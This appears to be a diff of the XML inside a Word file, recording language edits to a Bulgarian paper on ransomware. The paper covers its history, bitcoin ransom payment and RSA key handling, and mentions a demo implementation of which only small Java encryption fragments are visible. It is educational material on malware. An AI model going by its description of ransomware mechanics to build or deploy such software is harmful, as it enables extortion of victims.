+      <w:r>
+        <w:t xml:space="preserve"> При традиционното банкиране участниците са ясно идентифицирани – име, банка, </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">сметки, наличности, </w:t>
+      </w:r>
+      <w:r>
+        <w:t>държава, регулации и т.н. При криптовалутите адрес</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ът на получателя </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">на сметката не съдържа директна лична информация. Липсва и централизиран контролен орган. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>П</w:t>
+      </w:r>
+      <w:r>
+        <w:t>очти невъзможн</w:t>
+      </w:r>
+      <w:r>
+        <w:t>о е п</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">реводите </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">да бъдат спрени, замразени, върнати или проследени от институциите.  </w:t>
+      </w:r>
+      <w:r>
+        <w:t>„</w:t>
+      </w:r>
+      <w:r>
+        <w:t>Изпирането</w:t>
+      </w:r>
+      <w:r>
+        <w:t>“</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> на валутата е сравнително лесно – чрез т.нар. </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3003,10 +3346,73 @@
         <w:t>privacy coins.</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> Минус на биткойна, е че не всяка жертва е достатъчно запознат как да го предостави и да се откупи. Някои от хакерите са заловени, понеже са </w:t>
-      </w:r>
-      <w:r>
-        <w:t>пускали видеоконференции, за да покажат как да го направят.</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Отрицателната страна</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> на биткойна е</w:t>
+      </w:r>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> че не вс</w:t>
+      </w:r>
+      <w:r>
+        <w:t>е</w:t>
+      </w:r>
+      <w:r>
+        <w:t>к</w:t>
+      </w:r>
+      <w:r>
+        <w:t>и</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>потърпевш</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> е достатъчно запознат как да го предостави</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, за да си върне информацията. </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Някои от </w:t>
+      </w:r>
+      <w:r>
+        <w:t>компютърните престъпници</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> са </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">разкрити и </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">заловени, </w:t>
+      </w:r>
+      <w:r>
+        <w:t>защото са провеждали</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> видеоконференции, </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">на които са показвали на засегнатите как </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">да </w:t>
+      </w:r>
+      <w:r>
+        <w:t>предоставят биткойна</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3041,34 +3447,62 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> и прилага по-съвременни криптографски методи. Той използва 2048-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
+        <w:t xml:space="preserve"> и прилага по-съвременни криптографски методи. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>Той използва 2048-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>bit</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve">RSA </w:t>
       </w:r>
       <w:r>
         <w:rPr>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>key pairs</w:t>
       </w:r>
       <w:r>
-        <w:t>, генерирани от командно-контролен сървър и изпращани към жертвата.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, генерирани от командно-контролен сървър и изпращани към </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>пострадалия</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
@@ -3076,6 +3510,7 @@
       <w:sdt>
         <w:sdtPr>
           <w:rPr>
+            <w:highlight w:val="yellow"/>
             <w:lang w:val="en-US"/>
           </w:rPr>
           <w:id w:val="1977027603"/>
@@ -3084,15 +3519,20 @@
         <w:sdtContent>
           <w:r>
             <w:rPr>
+              <w:highlight w:val="yellow"/>
               <w:lang w:val="en-US"/>
             </w:rPr>
             <w:fldChar w:fldCharType="begin"/>
           </w:r>
           <w:r>
+            <w:rPr>
+              <w:highlight w:val="yellow"/>
+            </w:rPr>
             <w:instrText xml:space="preserve"> CITATION Kur22 \l 1026 </w:instrText>
           </w:r>
           <w:r>
             <w:rPr>
+              <w:highlight w:val="yellow"/>
               <w:lang w:val="en-US"/>
             </w:rPr>
             <w:fldChar w:fldCharType="separate"/>
@@ -3100,11 +3540,13 @@
           <w:r>
             <w:rPr>
               <w:noProof/>
+              <w:highlight w:val="yellow"/>
             </w:rPr>
             <w:t>[3]</w:t>
           </w:r>
           <w:r>
             <w:rPr>
+              <w:highlight w:val="yellow"/>
               <w:lang w:val="en-US"/>
             </w:rPr>
             <w:fldChar w:fldCharType="end"/>
@@ -3121,7 +3563,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_Toc223468466"/>
+      <w:bookmarkStart w:id="2" w:name="_Toc223545522"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Еволюция на </w:t>
@@ -3148,7 +3590,7 @@
           <w:numId w:val="2"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc223468467"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc223545523"/>
       <w:r>
         <w:t xml:space="preserve">Ранна фаза на </w:t>
       </w:r>
@@ -3166,7 +3608,13 @@
         <w:ind w:firstLine="708"/>
       </w:pPr>
       <w:r>
-        <w:t>Първичната форма на софтуера за изнудване е, както вече споменахме, инфектирани флопидискове</w:t>
+        <w:t>Първичната форма на софтуера за изнудване е, както вече споменахме, инфектирани флопи</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>дискове</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3181,7 +3629,13 @@
         <w:t>1</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> е показано, съобщението, което се визуализира на системата афектирана от троянския кон - </w:t>
+        <w:t xml:space="preserve"> е показано съобщението, което се визуализира на системата</w:t>
+      </w:r>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> афектирана от троянския кон - </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">AIDS </w:t>
@@ -3232,7 +3686,19 @@
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">файла, който по-късно се използва да преброи колко пъти компютъра е стартиран. Когато стигне до 90, </w:t>
+        <w:t>файла, който по-късно се използва да преброи колко пъти компютър</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ът</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> е стартиран. Когато </w:t>
+      </w:r>
+      <w:r>
+        <w:t>броячът до</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">стигне до 90, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3241,7 +3707,13 @@
         <w:t>AIDS</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> скрива всички директории и криптира имената на всички файлове намиращи се на </w:t>
+        <w:t xml:space="preserve"> скрива всички директории и криптира имената на всички файлове</w:t>
+      </w:r>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> намиращи се на </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3250,6 +3722,16 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>C:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>драйв</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3369,14 +3851,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>1</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -3402,7 +3897,7 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">ъобщението за откуп на </w:t>
+        <w:t xml:space="preserve">ъобщение за откуп на </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3436,7 +3931,7 @@
           <w:numId w:val="2"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc223468468"/>
+      <w:bookmarkStart w:id="5" w:name="_Toc223545524"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -3490,7 +3985,13 @@
         <w:t xml:space="preserve"> Trojan</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> е първият вирус да използва асиметричен алгоритъм за криптиране на данни – </w:t>
+        <w:t xml:space="preserve"> е първият вирус</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, който </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">използва асиметричен алгоритъм за криптиране на данни – </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3499,7 +4000,13 @@
         <w:t>RSA</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> (фиг. 3). </w:t>
+        <w:t xml:space="preserve"> (фиг. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">). </w:t>
       </w:r>
       <w:sdt>
         <w:sdtPr>
@@ -3598,14 +4105,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>2</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -3675,13 +4195,52 @@
         <w:ind w:firstLine="708"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Алгоритъмът използва два ключа, с които се криптира и декриптира информация. </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Основната идея е имайки единия ключ да е математически много трудно да бъде изчислен какъв е другия. По този начин става възможно свободно</w:t>
-      </w:r>
-      <w:r>
-        <w:t>то използвана на</w:t>
+        <w:t xml:space="preserve">Алгоритъмът използва два ключа, </w:t>
+      </w:r>
+      <w:r>
+        <w:t>чрез</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> които се криптира и декриптира информация. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Основната идея е</w:t>
+      </w:r>
+      <w:r>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>разполагайки с</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> единия ключ да е </w:t>
+      </w:r>
+      <w:r>
+        <w:t>много трудно</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>математически да бъде изчислен какъв е другия</w:t>
+      </w:r>
+      <w:r>
+        <w:t>т</w:t>
+      </w:r>
+      <w:r>
+        <w:t>. По този начин става възможно свободно</w:t>
+      </w:r>
+      <w:r>
+        <w:t>то използван</w:t>
+      </w:r>
+      <w:r>
+        <w:t>е</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> на</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> единия от ключовете като "публичен"</w:t>
@@ -3690,10 +4249,52 @@
         <w:t>,</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> а другия да остане "таен" (само собственика го притежава и никой друг не може в разумно време да го намери).</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Хакерът притежава частния ключ.</w:t>
+        <w:t xml:space="preserve"> а другия</w:t>
+      </w:r>
+      <w:r>
+        <w:t>т</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> да остане "таен" (само собственик</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ът</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> го притежава и никой друг не може в разумно време да го намери).</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">В конкретния случай </w:t>
+      </w:r>
+      <w:r>
+        <w:t>х</w:t>
+      </w:r>
+      <w:r>
+        <w:t>акерът</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> играе роля на собственик, който </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">притежава частния </w:t>
+      </w:r>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:t>тайния</w:t>
+      </w:r>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>ключ.</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
@@ -3802,22 +4403,38 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> директорията (фиг. 4) и изисква от потърпевшия да закупи артикули от онлайн аптека, в замяна ще получи 30 символен код, за да възстанови всичките си файлове.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Известен „недостатък“ на вируса, е че дори жертвата да заплати откупа</w:t>
+        <w:t xml:space="preserve"> директорията (фиг. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>3</w:t>
+      </w:r>
+      <w:r>
+        <w:t>) и изисква от потърпевшия да закупи артикули от онлайн аптека, в замяна ще получи 30 символен код, за да възстанови всичките си файлове.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Известен „недостатък“ на вируса е</w:t>
       </w:r>
       <w:r>
         <w:t>,</w:t>
       </w:r>
       <w:r>
+        <w:t xml:space="preserve"> че дори </w:t>
+      </w:r>
+      <w:r>
+        <w:t>пострадалият</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> да заплати откупа</w:t>
+      </w:r>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
         <w:t xml:space="preserve"> някои от файловете остават </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>коруптнати</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>безвъзвратно увредени</w:t>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve">. </w:t>
       </w:r>
@@ -3927,14 +4544,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>3</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>3</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -3989,7 +4619,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc223468469"/>
+      <w:bookmarkStart w:id="8" w:name="_Toc223545525"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -4318,14 +4948,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>4</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>4</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
@@ -4427,14 +5070,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>5</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>5</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
@@ -4470,7 +5126,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="11" w:name="_Toc223468470"/>
+      <w:bookmarkStart w:id="11" w:name="_Toc223545526"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -4632,14 +5288,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>6</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>6</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
@@ -4672,7 +5341,7 @@
           <w:numId w:val="2"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="13" w:name="_Toc223468471"/>
+      <w:bookmarkStart w:id="13" w:name="_Toc223545527"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -4759,14 +5428,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>7</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>7</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
@@ -4943,8 +5625,13 @@
         </w:rPr>
         <w:t>ransomware-</w:t>
       </w:r>
-      <w:r>
-        <w:t>ът и се изисква откуп в биткойни.</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ът</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> и се изисква откуп в биткойни.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4962,7 +5649,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="15" w:name="_Toc223468472"/>
+      <w:bookmarkStart w:id="15" w:name="_Toc223545528"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Ролята на </w:t>
@@ -5269,6 +5956,9 @@
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02891911" wp14:editId="4B6B4122">
             <wp:extent cx="5427980" cy="2679773"/>
@@ -5376,7 +6066,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="16" w:name="_Toc223468473"/>
+      <w:bookmarkStart w:id="16" w:name="_Toc223545529"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Имплементация на </w:t>
@@ -5730,14 +6420,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>9</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>9</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:t>:</w:t>
       </w:r>
@@ -5868,15 +6571,7 @@
         <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">String </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>decrypt(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">String </w:t>
+        <w:t xml:space="preserve">String decrypt(String </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -5899,14 +6594,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>10</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>10</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -5964,7 +6672,6 @@
         <w:t xml:space="preserve">    return new </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>HexEncodingTextEncryptor</w:t>
       </w:r>
@@ -5980,11 +6687,7 @@
         <w:t>standard</w:t>
       </w:r>
       <w:r>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>password, salt));</w:t>
+        <w:t>(password, salt));</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -5999,14 +6702,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>11</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>11</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:t>: Метод от класа, която се използва в демото</w:t>
       </w:r>
@@ -6837,7 +7553,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="18" w:name="_Toc223468474"/>
+      <w:bookmarkStart w:id="18" w:name="_Toc223545530"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Демонстрация на </w:t>
@@ -6854,7 +7570,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="19" w:name="_Toc223468475"/>
+      <w:bookmarkStart w:id="19" w:name="_Toc223545531"/>
       <w:r>
         <w:t>Съдържание на текстовите файлове преди криптирането:</w:t>
       </w:r>
@@ -6880,14 +7596,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>12</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
